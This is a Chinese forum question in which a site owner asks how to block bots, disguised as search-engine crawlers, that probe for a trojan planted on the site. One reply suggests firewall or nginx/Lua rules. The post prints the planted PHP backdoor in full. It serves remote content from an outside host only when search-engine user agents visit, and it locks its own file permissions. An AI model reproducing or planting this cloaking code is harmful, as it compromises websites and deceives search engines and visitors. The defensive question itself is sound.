Linux服务器如何屏蔽一些恶意请求?类似种木马、注入代码检测等请求

发布于 2022-09-12 13:19:44 字数 548 浏览 18 评论 0

image.png

如上图,有很多伪装成百度或者谷歌、头条的恶意请求,来判断网站首页是否被注入了他们的木马文件(已删除),如下:

<?php
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF']; $name= substr($url1 ,strrpos($url1 ,'/')+1 );
chmod($name,0444);
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
 $file = file_get_contents('http://a.fefb.buzz/?scs'); 
echo $file;
 exit ;
}
?>

所以请问有什么好的办法,在Linxu层或者Nginx层去屏蔽掉这些请求?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

空袭的梦i 2022-09-19 13:19:44

linux 的话,使用防火墙屏蔽对方 ip,不过这个伤害太大,封掉的 ip可能是一个 cdn 节点

nginx 这一层会方便的多.自己识别请求模式后写判断可以. 增加 ngx_lua 插件或者直接使用 openresty 用lua写一些复杂的规则甚至写个 waf 也可以.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文